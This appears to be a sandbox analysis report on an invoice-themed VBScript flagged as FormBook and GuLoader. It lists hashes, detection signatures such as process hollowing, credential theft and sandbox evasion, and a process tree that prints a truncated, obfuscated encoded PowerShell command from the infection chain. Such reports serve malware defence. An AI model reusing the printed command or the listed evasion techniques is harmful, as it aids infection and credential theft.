Edit tour
Windows
Analysis Report
WWVN_INVOICE_8363567453.vbs
Overview
General Information
| Sample Name: | WWVN_INVOICE_8363567453.vbs |
| Analysis ID: | 623396 |
| MD5: | 9f8e253fd51c33a2f874942ebc0d3795 |
| SHA1: | 6868a9005489e56542cf0df063985132fef50f3d |
| SHA256: | c33e4e9bf305cec123840dd87aa84c6d71e68ac82ea039418e1b8be3ed791b37 |
| Infos: |  |
 | |
Detection
FormBook, GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64native
wscript.exe (PID: 9728 cmdline: C:\Windows \System32\ wscript.ex e "C:\User s\user\Des ktop\WWVN_ INVOICE_83 63567453.v bs" MD5: 0639B0A6F69B3265C1E42227D650B7D1) 
powershell.exe (PID: 4736 cmdline: C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe" - EncodedCom mand "IwBO AGEAbgBkAG kAbgBtAGUA NQAgAEIAbw BiAGwAZQBr AGEAIABBAH IAdABpAGsA dQBsAGUAcg AgAGgAbwB0 AG0AIABGAG 8AcgBtAG4A aQBuADQAIA BWAGkAZwBl AHMAaQBtAG 8AawBpADYA IABzAHQAbw BtACAARQBj AGgAaQBuAG kAdAA2ACAA cAByAG8Abg BhAHQAaQB2 ACAAUAB5AH IAbwAgAFQA ZQB4AHQAdA B2ADcAIABF AGwAZQB2AG EAdABvAHIA ZgByACAAUg BBAE0AUgBP AEQAUwBBAC AAUQBlAGsA dQByAHMAdQ BzAHMAIABi AGUAYQBuAH AAbwAgAFMA awByAGsAMg AgAHAAbwBs AGEAcgBpAC AAbQBlAGQA ZQBvAGwAYQ AgAEwAbwBy AGEAIABSAG EAcABoAGkA NgAgAA0ACg AjAGQAZQBm AGEAIABwAG kAZQBkACAA VABhAG4AZA BrAGQAcwBi AGUAIABVAG 4AaQBtAG0A bwByACAAQg BhAGQAZwBl AHIAYgA2AC AAZQB4AGMA bAB1AHMAIA BDAGgAbwBu AGQAcgBvAG cAOAAgAEEA RQBSAE8ATA BPACAARgBJ AFMASABFAF IATQBBAE4A SQAgAEYAQQ BHAEkATgBU AEUARwBSAC AASQBuAGMA ZQBwAHQAbw AzACAAUwBu AHUAcgBsAD YAIABCAGkA cwBlAHgAdQ BhACAAZABv AHMAcwBlAH IAIABnAGEA dgBlAGwAIA BtAGUAdABh AGYAbwByAG UAIAB0AHIA YQBuACAAYQ B0AGEAawAg AFMAZQBpAH MAbQBpADIA IABOAG8Abg BmAGEAYgB1 AGwAIABEAG kAZwB0AGUA awAzACAAUg BFAEcATgBT AEsAQQAgAF AAaAB5AHQA bwBtAGUAOQ AgAE0AdQBy AGEAZQAgAE gAYQBsAHYA OAAgAFYATw BDAEkARgBF AFIAQQBUAE UAIABXAE8A TwBEAEMAUg BBAEYAVAAg AGgAYQByAG QAaABlAGEA cgB0ACAASw BuAGkAYgAg AHMAZQBqAH QAIAANAAoA IwBJAG0AbQ BlAHIAdgBr ADgAIABTAH AAcgBvAGcA ZgBsACAAUg BFAEQAUwBI AEkAIABzAG kAZgBmAGwA ZQB1AHMAIA BTAHUAcABl AHIAIAByAG kAZgB0AGUA cgBzACAARw ByAG8AdQBj AGgAIABQAH IAbwBlAHYA ZQB0AGkAIA BQAFIATwBU AEUATgBTAE kAIABMAHkA ZABiAGkAbA BsAGUAZABl ACAAUwBVAE IARQBMAEUA QwBUAFIAIA BSAGEAbQBt AGUAdABjAG gAbwByACAA QwBJAFMAUw BFAFMAQQBS ACAAQgByAG UAZAAgAGoA bwByAGQAZg BzAHQAZQAg AEEAbgB0AG kAcwBlAG4A cwAgAEwATw BYAE8AIAAN AAoAIwBTAH AAbAB1AHIA ZwB5AHAAeQ A3ACAAUwBl AHAAdABlAG 4AIABEAGkA bQBzACAAVA BlAGIAcgBl AHYAcwB1AG 4AYwAyACAA UwB0AHQAdA BlAHAAMgAg AGwAaQBrAH YAaQBkAGUA IABBAGYAdA B2AGkAIABw AGEAbgB0AG 8AZwAgAHYA ZQBqAGIAeQ BnACAAYwBv AGMAbwAgAE kAUwBCAFIA WQAgAFAAQQ BTAFMAIABQ AGkAbgBmAC AAbQB1AG4A aQBrAGEAdA AgAHUAbgBz AGUAIABHAF UATABEAFIA IABNAGUAbA BvAGQAaQBv AHUAIABwAG EAbgBpAG0A ZQB0AGUAIA BSAGEAZgB0 AGUAcwBvAH MAdABlACAA YQB2AGEAbg BjAGUAbQBl AG4AdAAgAE UAbgB0AGUA YQBzAHUAYg BwAHIAIABN AFkAQwBFAC AAVABpAGQA bABuAG4AZQ BkAGUAMwAg AG8AZAB5AH MAcwBlAG4A IABkAHIAeQ BwAHQAcgBy AGUAbgAgAH AAZQByAHMA bwAgAA0ACg AjAGgAbwBy AG4AIABDAG UAbgB0AHIA NAAgAEgAZQ BuAHIAeQBr AGsAZQBzAG wAOAAgAEYA TwBSAEQAQQ BNAFAATgBJ AE4AIABJAG 4AdAByAGEA ZgBvAGwAIA BDAGEAbABk AHIAbwBuAC AAaQBuAGYA cgAgAHYAYQ BsAGcAIABT AEkAUwBZAF IASQAgAEcA ZQBuAG8AYQ BrAG8AIABz AGsAYQBkAG UAZwByAGUA cgAgAFUAbg BkAGUAcgBh AGYAcwBuAG kAMgAgAFYA YQBjAGMAaQ BuAGEAdAAg AGQAcgBpAG wAbABlAHIA aQBlAHIAIA BDAEgAQQBJ ACAADQAKAC MARABlAHQA bwB4AGkAZg AgAGEAZgBt AGEAbABpAC AASABtAG0A